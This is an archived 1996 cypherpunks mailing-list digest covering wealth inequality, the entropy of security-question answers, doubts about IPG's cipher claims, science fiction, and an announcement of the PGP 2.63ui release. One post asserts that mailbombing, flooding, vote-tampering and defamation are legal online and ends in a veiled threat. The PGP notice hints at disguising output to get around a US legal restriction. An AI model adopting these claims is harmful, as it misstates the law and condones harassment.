From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Sat, 23 Nov 1996 09:41:21 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: wealth and property rights
In-Reply-To: <199611191237.MAA00639@server.test.net>
Message-ID: <32973816.4098@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Jon Galt wrote:
> 
> Adam Back wrote:
>>> See, if you spend your money now, on the above, you have no right to
>>> criticize me when I look relatively wealthy later.  It's your choice
>>> to blow your money.
> 
>>  Steve Boursy writes:
>>   I agree--that's not what I was talking about--the majority of wealth
>> is handed down not earned--and the ability to earn also more often
>> than not results in hand me down priv.
> 
> What an interesting topic for this list.  


  Yes--crossbreeding has it's advantages.

> I really must point out that most wealth in this country 
> is first generation wealth - in other words, most
> wealth is EARNED, not "handed down".


  That's not even close to the truth.

 
>>> Btw, people of your mentality (communists/socialists) already make it
>>> very difficult for me to accumulate,
>>
>>   We do our best--some day we'll take it all away--really.
>
> 
> Let me just make sure I have this straight.  Stephen Boursy (and the
> freedom-knights?) is (are) against people being allowed to accumulate
> too much wealth in relation to those around them.  Adam Back (and
> the cypherpunks?) is (are) against people being prevented from
> accumulating "too much" wealth in relation to those around them.
> 
> Is that right?


  What a simple mind--coming from an Ann Rand fan though that's really
no surprise.

  Because I'm on the Freedom Knights list you assume I am speaking
on their behalf?  And because Adam is on the cypherpunks list you
assume him to be speaking on their behalf?  That's rather simple
minded.  My tie to Freedom Knights has to do with the belief that
one may freely speek their mind on the net--period.  My beliefs
regarding the redistribution of income may or may not be shared
by different members of the FK list. Personally I don't believe
in the right to accumulate excess wealth and certainly don't 
believe in the 'right' to pass it down through the generations.

                         Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 23 Nov 1996 11:06:29 -0800 (PST)
To: Jim Wise <jim@santafe.arch.columbia.edu>
Subject: Re: wealth and property rights
In-Reply-To: <Pine.NEB.3.94.961123040742.14111A-100000@localhost>
Message-ID: <Pine.BSF.3.91.961123124906.6152C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 23 Nov 1996, Jim Wise wrote:

> On Fri, 22 Nov 1996, `Jon Galt' wrote:
> 
> > What an interesting topic for this list.  I really must point out that most
> > wealth in this country is first generation wealth - in other words, most
> > wealth is EARNED, not "handed down".
>  
> Please back this statement up.  The fact is, contrary to our grand self-image,
> America has one of the lowest rates of class mobility in the world.  Just shy
> of forty percent of the wealth (in land and capital) in the U.S. is possessed
> by one percent of the  population.  This far outstrips, for example, 
> Great Britain, where the top one percent of society holds 18% of the nation's
> wealth.  Continuing down the line, the top 20% of the us population hold more
> than 80% of the nation's wealth.  [Source New York Times, April 17. 1995, p.1]
> 

Yup. I agree with you here - every year Forbes puts out its list of the 
richest people in America. I'm too lazy to go digging under the coffee 
table to find the issue, but as I recall, a good number of the people on 
the list made their money the old-fasioned way - they inherited it.

Also - most people inthis country do not have true "wealth" - most are
fairly leveraged with mortgages and other loans, so their true net worth
is not all that high.

The "coupon-clipping" class is mostly "old money."

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 23 Nov 1996 10:09:50 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: wealth and property rights
Message-ID: <9611231809.AA03975@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 21 Nov 96 at 18:35, Dave Hayes wrote:

> However, I would question the implication that "socialists" are
> responsible for the higher tax rates you currently experience.  
> 
> For example, I could make a strong case that you really have some
> clever "capitalists" who have learned how to express their
> "capitalism" quite effectively across the space of all people in a
> "country".

OK.  I am not on Cypherpunks anymore but this leftover of the mail queue 
landed in my mailbox.  So, please, reply directly.

I just couldn't let this one pass by me without jumping on it.  :)

Your second paragraph is attacking a straw man.  You even included the word
'capitalist' in double quotes (").  The common point between socialists and
theses so-called "capitalists" is that they both use that fact that some
coercion is enacted on a given population to get rich an/or powerful.  

The socialists seek, as a value, power over producers and your "capitalists"
seek to get rich and/or powerfull. But both blank out the cause of the
obtention of their goals: legally exerted coercion (via govt rules and
powers).  To use terms coined by a well known writer, one is a Witch Doctor,
the other is an Attila (morally sanctionned by the Witch Doctor).  They
natures are not opposite, they are simply both sides of the same coin.

I sometimes wish peoples would use words for what they really mean...

jfa
Please reply or Cc. directly to me.
Jean-Francois Avon, Pierrefonds (Montreal) QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultants
    physicists and engineers, LabView programing
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
ID# 5B51964D : 152ACCBCD4A481B0 254011193237822C 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sat, 23 Nov 1996 13:32:47 -0800 (PST)
To: pfarrell@netcom.com
Subject: Re: how much entropy in common answers
Message-ID: <199611232126.NAA00899@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Pat Farrell <pfarrell@netcom.com>
> Clearly there are cultural issues involved. The entropy in a question
> such as "what is your favorite brother's name?" is low in an Irish
> family like mine where names cluster arround choices such as are Patrick,
> John, Sean, and Dan.
>
> So how do we measure the entropy objectively?

You have to estimate the probability that the attacker will guess what you
have chosen.  This will depend on how much the attacker knows about you.
If he knows that you're Irish, it will help in the question above.  If he
knows the names of your brothers, it will help a lot more.  Probably
it is best to be conservative in assuming what your attacker knows.

If you have four brothers and nobody whom the attacker could ask will
know who is your favorite, but you think he could find out there names,
then he has probably a 1/4 chance of guessing right.  (Actually he
might do better by preferring older brothers rather than younger, etc.)
The amount of entropy is then negative log 2 of the probability, or 2
in this case (2**-2 is 1/4).

For cars, if 50% of people like you would have chosen Mustangs, 
40% Camaros, and the remaining 10% scattered among other brands, then
if your favorite car was a Mustang that is only worth about 1 bit.  But
if your favorite car was an Oldsmobile there might be only 1/100 chance
of the attacker guessing that, so it could be worth 6 or 7 bits.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 23 Nov 1996 10:48:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Star Trek: First Contact
In-Reply-To: <199611230853.AAA10184@netcom6.netcom.com>
Message-ID: <v03007828aebcf00bd828@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:57 am -0500 11/23/96, Bill Frantz wrote:
>For the fans of E.E.(Doc) Smith, go see this movie.

Lensmen of the world untie your bracelets! Free yourselves from your weevil
capitalist masters!

>OBCrypto: Data locks the main computer with a fractal cypher.

Known source of entropy, those fractals. ;-). Ah... DreckPhysics. Gotta
love it.

>OBMoney: Picard states the they don't have money in the 24th century.
>Instead they work for the good of mankind.

Hrm. Looks like they're ripping off Iain Banks too. :-). First Niven, now
Banks. Life is hard when you have to keep that production pipe full...

>Nanotechnology must have made
>everything material possible, so the only reward left is status (aka
>reputation).

Funny, I didn't think they had nano in the 23rd century. Except for the
"Genesis Bomb". No, wait, that was matte painting, wasn't it?

Even Babylon 5, AKA "Science Fiction He Wrote", has a bigger clue.

Feh.

Yes. I know. Resistance is futile. I've been assimilated. I'll go anyway...

;-).

Cheers,
Bob Hettinga




-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 23 Nov 1996 13:29:45 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Star Trek: First Contact
Message-ID: <199611232129.NAA06160@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:02 AM 11/23/96 -0500, Black Unicorn wrote:
>On Sat, 23 Nov 1996, Bill Frantz wrote:
>> OBMoney: Picard states the they don't have money in the 24th century. 
>> Instead they work for the good of mankind.  Nanotechnology must have made
>> everything material possible, so the only reward left is status (aka
>> reputation).
>
>Why doesn't everyone have a starship?

(Tongue firmly in cheek) It seems some feel that their best route to high
status is to be the crew member who beams down and dies.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Sat, 23 Nov 1996 11:55:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: sci fi
In-Reply-To: <3.0.32.19961121233535.0106ea44@mail.teleport.com>
Message-ID: <0mZpN1200YUh0A9980@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alan Olsen <alan@ctrl-alt-del.com> writes:
> At 09:50 PM 11/21/96 -0800, John Anonymous MacDonald wrote:
> >So will some exceptionally creative sort spend 3 or 4 hundred pages exploring
> >BlackNet and the future of global networking? 
> 
> We can only hope.

Sterling's "Islands in the Net" paints a picture of a global network
as a status quo reinforcing system, and where offshore data havens are
wiped out to the man by one world governemnt enforcers. Probably not
what you had in mind.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMpdWO8kz/YzIV3P5AQGtXgMApQtmWDfv18M+PGEC/JVuoZ8JaBg9gfzi
F771J7zNvMFoJgVcCgnoBiXatJCO6bSjb8qgv7wb+p2rLot1mhNEqYCvH70UzTUh
yG6dkJ7VB/iJceIDFAqpHzpkDNjB7ePG
=/OWe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 23 Nov 1996 08:19:43 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Q.E.D |= Montgolfiering + Inbongis + Fermented Pear Juice + AGA
In-Reply-To: <Pine.SUN.3.94.961123054542.12685C-100000@polaris>
Message-ID: <Pine.LNX.3.94.961123155648.12428B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 23 Nov 1996, Black Unicorn wrote:

> On Sat, 23 Nov 1996 wichita@cyberstation.net wrote:
> 
> > On Thu, 14 Nov 1996 paul@fatmans.demon.co.uk wrote:
> 
> > > Look, 
> 
> [...]
> 
> > > I thought you had finally gone away when I saw no posts from you for 
> > > about a week. I am depressed beyond belief to see you have returned 
> > > to interrupt the flow of discussion.... Leave and never return...
> > > 
> > Sorry about that old chap, but the last Englishmen that had the power
> > to command us here in the States was George III,
> 
> And if you are any indication, it's been downhill ever since he failed.
> 

Especially sence wichita was wrong: George III, obviously, didn't have the
power to control us.  If he did, the US would still be a colony.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Blood is thicker than water, and much tastier.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpcfGzCdEh3oIPAVAQHG2Qf/R6VYJMaQuMcUdetSHq1OBdbjbfbomYV9
k0+AzOnVA1Iri5gznj35zlyO3lYNn3ck4NdMjCQJeS1DoFjVJ002EwK6Wn7TKE/s
puNnp6yBco4c0IRcFOP+kriYP9c3xIoU6sa+aJ8Nid07q2Bzqygwyhvt9YwAfGwn
zBOoUEcX9tUGDIjCC3a56qttpPg417XGtbE8M1gER0B9LCHTn5utZtkbv5w3WDu3
uIpp9LNLdCtsHMbaOCcf/84JyxjwcwE2fbqeu3kZGw5K3HB3X64StgQHpHbvHK+u
1UcT5/8JMILF36ZbvmMVquF8fHpdX7T7Pwd6N8MI8t0zozqB57gKPA==
=42lh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 23 Nov 1996 16:35:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
Message-ID: <199611240021.QAA16004@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 12:33 PM 11/23/1996, Eric Murray wrote:
>John Anonymous MacDonald writes:
>> 
>> 
>> At 8:09 AM 11/23/1996, Eric Murray wrote:
>> >No, you can't.  It's impossible to prove an algorithim unbreakable.
>> 
>> No?  Please prove your assertion.
>
>You can't prove a negative.

If it can't be proven, why do you believe it is true?

The good news is that you can prove a negative.  For example, it has
been proven that there is no algorithm which can tell in all cases
whether an algorithm will stop.

>The best IPG could say is that
>it can't be broken with current technology.
>Next week someone might come up with a new way
>to break ciphers that renders the IPG algorithim breakable.

The best they can say is what they did say: they have a proof that
their system is unbreakable.  What you question, quite reasonably,
is whether they have such a proof.

>You point could have been that the same problem exists
>for proofs- that next week someone could come up
>with a way to prove, for all time, that an algorithim
>really IS unbreakable.  So, to cover that posibility
>I should have said "it's currently impossible to
>prove an algorithim unbreakable". :-)

Or, more accurately, nobody credible has seen such a proof.  But, a
clever person might invent one.

IPG is eager to demonstrate their proof.  They should hire a professional
skilled in the art to evaluate their proof and publicly announce the
results.  This costs less than $5000 and would be, presumably, a small part
of their profits should they have invented such an algorithm.

diGriz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sat, 23 Nov 1996 14:17:59 -0800 (PST)
To: Firebeard <stend@grendel.texas.net>
Subject: This is your last warning
In-Reply-To: <vpybfs5y35.fsf@grendel.austin.texas.net>
Message-ID: <Pine.LNX.3.95.961123165454.5640D-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On 23 Nov 1996, Firebeard wrote:

> >>>>> aga  writes:
> 
> a> It just "looks" that way on the net.  I do live-fucking, newsgroup
> a> flooding, mailbombing, vote-tampering and defamation all legally,
> a> and OPENLY on the InterNet.
> 

To be truly honest about this, (since you keep
putting that cypherpunks address in the header)
I have not really done any of the above yet, but they are
all perfectly legal in cyberspace.  Just get the
fucking point, there are no laws which can cross borders.

> a> The more you PGP, the worse you look.  Nobody reads your e-mail, so
> a> stop being so paranoid.
> 
> 	Hate to disabuse you, but I've had it done.  I've had military
> investigators hand me copies of email I've received, and ask me to
> explain them, and the actions I took (and did not take) in response.
> 

Just what kind of 'military investigators?'
Since you are a civilian, they should not have even
asked you that question.  You answer by privete email.

The net is clearly not military property but belongs solely
to international anarchists which can not be stopped by any laws.

> -- 
> #include <disclaimer.h>                               /* Sten Drescher */
> ObCDABait:      For she doted upon their paramours, whose flesh is as the
> flesh of asses, and whose issue is like the issue of horses.  [Eze 23:20]
> ObFelony: President Clinton, you suck, and those boys died!
> Unsolicited solicitations will be proofread for a US$500/KB fee.
> 

Now look, I have told you before.  Stop writing to me and
using the cypherpunks address as a cc in the header.

I told you before that I am not going to write to that fucking list
any more, and if I receive any more e-mail from you with their
address in the header, well...

You have been doing this for a number of days now.
This is your last warning.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pat Farrell <pfarrell@netcom.com>
Date: Sat, 23 Nov 1996 14:25:39 -0800 (PST)
To: Hal Finney <pfarrell@netcom.com
Subject: Re: how much entropy in common answers
Message-ID: <199611232225.OAA15379@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:26 PM 11/23/96 -0800, Hal Finney wrote:
>From: Pat Farrell <pfarrell@netcom.com>
>> Clearly there are cultural issues involved. The entropy in a question
>> such as "what is your favorite brother's name?" is low in an Irish
>> family like mine where names cluster arround choices such as are Patrick,
>> John, Sean, and Dan.
>> So how do we measure the entropy objectively?
>
>You have to estimate the probability that the attacker will guess what you
>have chosen.  This will depend on how much the attacker knows about you.
>If he knows that you're Irish, it will help in the question above.  If he
>knows the names of your brothers, it will help a lot more.  Probably
>it is best to be conservative in assuming what your attacker knows.

I was really hoping for some insight into the general problem.
If you knew that my family is Irish, that makes certain names
much more likely. Obviously if you know that I've got five brothers,
a little bit of work will probably let you know that they are Tom, Dick,
Harry, Mike, and John. But that is an example of a terrible question for Carl's
approach. I was asking the more general question.

Carl suggested that in general a first name has about eight bits of entropy.
But knowledge of the social environment can seriously reduce it. Jenifer was
a hugely popular name for girls in the US ten to 20 years ago. You'd
expect more Juan's and Jose's in a Hispanic community, just like you'd expect
the Dan's, Pat's, Mike's, in an Irish community.

I know that the classic definition of entropy is, but without knowledge of
the statistical universe that we're dealing with, how can I measure it?
The probability that a male's first name is Harry is probably pretty low
in general, yet it is exactly 20% if you restrict the world to my brothers.

Carl suggested "What was the name of the first person on whom I had a crush?"
But if 33% of the women are named "Maria" in the local universe, then
that is not much entropy. Yet a name of "Maria McGee" is probably 
fairly high entropy, as it is an unlikely combination. If you were raised
in a small rural area, there might not be all that many possible
answers to Carl's question.

>If you have four brothers and nobody whom the attacker could ask will
>know who is your favorite, but you think he could find out there names,
>then he has probably a 1/4 chance of guessing right.  (Actually he
>might do better by preferring older brothers rather than younger, etc.)

This is exactly the type of local social bias that I want to measure.
We would expect that an older brother could be a role model, etc. and thus
be more likely to be the "favorite"

How do I know when I've got Carl's 90 bits of entropy?

Pat

Pat Farrell    CyberCash, Inc. 			(703) 715-7834
pfarrell@cybercash.com
#include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 23 Nov 1996 14:55:59 -0800 (PST)
To: Eric Murray <ericm@lne.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611232033.MAA01386@slack.lne.com>
Message-ID: <Pine.SUN.3.94.961123175345.20738B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Nov 1996, Eric Murray wrote:

> John Anonymous MacDonald writes:
> > 
> > 
> > At 8:09 AM 11/23/1996, Eric Murray wrote:
> > >No, you can't.  It's impossible to prove an algorithim unbreakable.
> > 
> > No?  Please prove your assertion.
> 
> You can't prove a negative.  The best IPG could say is that
> it can't be broken with current technology.
> Next week someone might come up with a new way
> to break ciphers that renders the IPG algorithim breakable.

Someone needs to write an IPG and Don Wood FAQ.  No, I'm not volunteering.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 23 Nov 1996 18:42:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
Message-ID: <199611240241.SAA29110@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:21 PM 11/23/96 -0800, John Anonymous MacDonald wrote:
>At 12:33 PM 11/23/1996, Eric Murray wrote:
>>You point could have been that the same problem exists
>>for proofs- that next week someone could come up
>>with a way to prove, for all time, that an algorithim
>>really IS unbreakable.  So, to cover that posibility
>>I should have said "it's currently impossible to
>>prove an algorithim unbreakable". :-)
>
>Or, more accurately, nobody credible has seen such a proof.  But, a
>clever person might invent one.

I thought Shannon proved one-time-pads to be unbreakable using information
theory.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 23 Nov 1996 17:02:22 -0800 (PST)
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.SUN.3.94.961123175345.20738B-100000@polaris>
Message-ID: <199611240059.SAA16286@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Black Unicorn wrote:
> On Sat, 23 Nov 1996, Eric Murray wrote:
> > John Anonymous MacDonald writes:
> > > 
> > > 
> > > At 8:09 AM 11/23/1996, Eric Murray wrote:
> > > >No, you can't.  It's impossible to prove an algorithim unbreakable.
> > > 
> > > No?  Please prove your assertion.
> > 
> > You can't prove a negative.  The best IPG could say is that
> > it can't be broken with current technology.
> > Next week someone might come up with a new way
> > to break ciphers that renders the IPG algorithim breakable.
> 
> Someone needs to write an IPG and Don Wood FAQ.  No, I'm not volunteering.

As a crypto amateur, I would appreciate a good technical explanation as
to why IPG's algorithm cannot be considered secure.

Thank you.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 23 Nov 1996 19:37:15 -0800 (PST)
To: jf_avon@citenet.net
Subject: Re: wealth and property rights
In-Reply-To: <9611231809.AA03975@cti02.citenet.net>
Message-ID: <3297BAFE.1460@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Francois Avon wrote:
> On 21 Nov 96 at 18:35, Dave Hayes wrote:
> > However, I would question the implication that "socialists" are
> > responsible for the higher tax rates you currently experience.
> > For example, I could make a strong case that you really have some
> > clever "capitalists" who have learned how to express their
> > "capitalism" quite effectively across the space of all people in a
> > "country".

[snippo]

Willis Carto, a man who is more discredited in the U.S. than most (he
is alleged to be extremely anti-Semitic, although Mark Lane says not so),
says that "Capitalism is generally just as much an enemy of Free Enterprise
as is Socialism" (quote approximate), since both promote monopolies.

I think you all know of the potential dangers of Populism (Carto's
preference), so perhaps the "Devil is in the details", as they say...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Crompton <sunray@globalnet.co.uk>
Date: Sat, 23 Nov 1996 11:43:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Announce PGP263UI (long message)
Message-ID: <1.5.4.16.19961123194402.1cafcf4c@mail.globalnet.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

To All PGP Users:

I am happy to announce the availability of PGP 2.63ui, the successor
to PGP 2.6ui and 2.62ui, an unofficial international release of the
famous public key encryption program, based originally on version
2.3a.

This version is being made available for a number of reasons:

* It is the only version fully compatible with *all* versions of PGP
from 2.0 to 2.7

* It incorporates a number of bug fixes and features not available
in the MIT release (see below) or in Stale Schumaker's 2.6.x.i
releases based on the MIT release.

* This version, like 2.3a and 2.6xui before it, is published under the
terms of the GPL. Consequently:

  - You are not bound by the RSADSI licence since this version does not
  use RSAREF (which forbids commercial use and unauthorised use of the
  cryptograpgic routines), as you are with MIT PGP

  - You are not bound by the MIT licence (which requires the program
  to produce output that cannot be read by earlier versions), as you are
  with both MIT PGP and Staale Schumacher's PGP 2.6.xi.

  - you can therefore do what you like with the code of the program
  provided any derivative work is also GPL'd.

  - The only relevant patent for users outside the USA is Ascom-Tech's
  patent on IDEA. For non-commercial use it's free, anywhere. For
  commercial use you need  a license, but Ascom-Tech offers a single-
  user license for a modest fee. See

    http://www.ascom.ch/systec

Users inside the USA may not legally use 2.63ui, because the RSA
patent is in effect there. USA residents are advised to obtain one
of the MIT versions which have a license for non-commercial use of
RSA.

However, I note in passing that by using the armor_version parameter
in CONFIG.TXT, that armored output from PGP 2.63ui can be made
difficult or impossible to distinguish from other versions.

Note that I personally have not done very much of the actual coding on
this version.  However if bugs are reported or constructive
suggestions for improvements made I will pass them on to the
individual(s) who have done the bulk of the work to make this release
possible.  I am assured that continuing support will be provided.

This is a partial list of the changes and fixes since 2.62ui.
A complete list is in file 263UICHG.ASC, which is inside both
ZIP distribution files.

Added CONFIG.TXT Parameters:

LabelEncrypt = on     # Label Encrypted Armored files with Recipient(s)

This will add readable text in front of an encrypted and armored file
listing the public keys used to encrypt it.  The format of the text is
similar to what appears on the console during (-l) decryption.

PrePendSigV=on      # Prepend Signature Verification msg to output text

When verifying the signature on a text (not binary) file, and a
detached signature (-b) is not requested, PGP 2.63ui will prepend a
message with the results of the signature verification (good or bad)
similar to what appears on the console.

Expanded Compatibility with Early PGP Versions.

version_byte=3 is usually set to Emulate PGP 2.6 after 9/1/94

Version_byte must be set to 2 before encrypting/signing
messages to be decrypted/verified by PGP 2.2 or 2.3a.

Also, unique to PGP 2.63ui, is the ability to set version_byte to 2
in extracted keys (-kx[a]).  This allows PGP 2.63ui to extract keys
which may have been created and/or signed by MIT PGP or by a ui
version with version_byte set to 3 and create an extracted key which
may be added (-ka) by PGP 2.3a.

Note that the reverse is not true. If version_byte=3, keys created
with version_byte=2 are -not- changed when extracted.

Expanded Error Checking

Most disk writes are now checked for errors or running out of disk
space.

Key Generation and other Keyring maintenance operations check for
write access to public and (where required) secret keyrings before
lengthy processing starts.  Previous versions were not checking if the
keyrings were set to read-only, which led to invalid results.

PGP 2.63ui allows you to change UserID's of keys not your own
(corresponding secret key not present).  You can sign the new ID
with your own secret key but (obviously) not with the other person's
secret key.

PGP 2.63ui is distributed in two ZIP files

   pg263ui.zip   [executables & documentation]
   pg263uis.zip  [source code & documentation]

They are currently available at:

ftp://ftp.funet.fi/pub/mirrors/utopia.hacktic.nl/pgp/pc/dos/

ftp://utopia.hacktic.nl/pub/replay/pub/pgp/pc/dos/

Each zip file contains a MANIFEST signed by me which gives the MD5
digests of all other files within the ZIP. You can use the MD5SUM.EXE
program included in pg263ui.zip to verify the MANIFEST (after using
PGP to strip the signature).

Here is the MANIFEST for pg263ui.zip

840317378232e54d03424e7e49a9bd4a *263UICHG.ASC
7408f5f49f74e0209f7a712a10c95e8e *CONFIG.TXT
83c8d06f39a0984066464e9a70e62550 *ES.HLP
64fa593bc5f188cf5a3cda03f3ed0ea5 *FR.HLP
480f583a2ac6776a4de7df6e7382545e *KEYS.ASC
5ba7143bad4739a4b749e492b5eee1ce *LANGUAGE.TXT
ecec59110e8a3bfd7fb195ec5964d5ce *MD5SUM.EXE
ca537810f4fdf5f359ec6583eeb176bb *PGP.EXE
3e2afe9edfc197554e9de9e3d433cdd0 *PGP.HLP
e1ef684d67c7e23143bca9163ce04966 *README.1ST
473d455178341f5f6e5f53394fd5a1d9 *README.2ND
a7491b03c6e87d57e34ec03ace211509 *README23.DOC
01a94cd84d68ea1cb905ce29caf0961e *DOC\BLURB23.TXT
ad4652e2dcfd4a0ecf91a2c01a7defd5 *DOC\COPYING
fbdd95ba04c9d2be5c4b8e2769482c32 *DOC\KEYSERV.DOC
8ab813656498102101d55b9ecfddde98 *DOC\NEWFOR22.DOC
cf12a2daac04470b6ad2b311cc514431 *DOC\NEWFOR23.DOC
5413061db46b1379a5489296c214ee38 *DOC\PGFORMAT.DOC
2a6c84401fc0c3b9febd77dd965c7b4f *DOC\PGP.1
33eeab5a938d0d33b8ca8ecf97038d73 *DOC\PGPDOC1.TXT
ff0d028f72c4632c2b87c099dce92180 *DOC\PGPDOC2.TXT
ca6253109c92944d44a9a1767f0b58ff *DOC\POLITIC.DOC
b648ac7c1c3aa7b0c92f80dc18dc9bcc *DOC\README.VMS
e4cfe2f3c28aab747f2396ae5e0a8ba8 *DOC\SETUP.DOC

Here is the MANIFEST for pg263uis.zip

840317378232e54d03424e7e49a9bd4a *263UICHG.ASC
7408f5f49f74e0209f7a712a10c95e8e *CONFIG.TXT
83c8d06f39a0984066464e9a70e62550 *ES.HLP
64fa593bc5f188cf5a3cda03f3ed0ea5 *FR.HLP
480f583a2ac6776a4de7df6e7382545e *KEYS.ASC
5ba7143bad4739a4b749e492b5eee1ce *LANGUAGE.TXT
3e2afe9edfc197554e9de9e3d433cdd0 *PGP.HLP
a7491b03c6e87d57e34ec03ace211509 *README23.DOC
e1ef684d67c7e23143bca9163ce04966 *README.1ST
473d455178341f5f6e5f53394fd5a1d9 *README.2ND
1a22a466840f14025a5de0118d6daa0d *CONTRIB\README
e8e9f513a273e86170e886c730a73307 *CONTRIB\ELM_NN\MAILPGP
56776ba15d847d005da2c95caa13744f *CONTRIB\ELM_NN\MOREPGP
8ae0fd91ea7ca5e041a5da4b78dce2c1 *CONTRIB\ELM_NN\POSTPGP
a2e4b46d2b0a6613a19061e8755024ca *CONTRIB\ELM_NN\README
0bf0ac13b4d019ed8b010ac3c0d30241 *CONTRIB\EMACS\PGP.EL1
52f5921095dd385796ae5fe6b2badbc6 *CONTRIB\EMACS\PGP.EL2
8de46004960bbca27de290a814fa6585 *CONTRIB\EMACS\RAT-PGP.EL
0188d65c58e003d50871a60412a86e58 *CONTRIB\EMACS\PGPEMACS.DOC
3a256a88091276b667a8283614122a76 *CONTRIB\IDEA\IDEA.ASM
fb995ab5c86fd45fcccc9c385d03c551 *CONTRIB\IDEA\README
1061623e095426e6ece416f75a15c643 *CONTRIB\IDEA\TEST.C
488b1cece84dd0853f491a5d10362ca4 *CONTRIB\MAIL_TIN\MAILPGP
994c5848ed0457eaf60ec086ad86048e *CONTRIB\MAIL_TIN\MOREPGP
f3afdb4e57ea645e7bfdbb1eb969a48c *CONTRIB\MAIL_TIN\POSTPGP
746f7fcfb23fc18974f06243201957eb *CONTRIB\MAIL_TIN\README
c037a9119d14999dc445ea47a75e7d48 *CONTRIB\MAILX\MAILER
06cebf8214342e286a7f3245c724ff4d *CONTRIB\MAILX\PGPMAIL2
eac85d75f64fef85da9afa399368890d *CONTRIB\MD5SUM\MD5SUM.C
5ca3e58ba621523b0d3feb026820fa63 *CONTRIB\MD5SUM\PGP23.MD5
6242095b32ea68409929194ad7e157bd *CONTRIB\MD5SUM\README
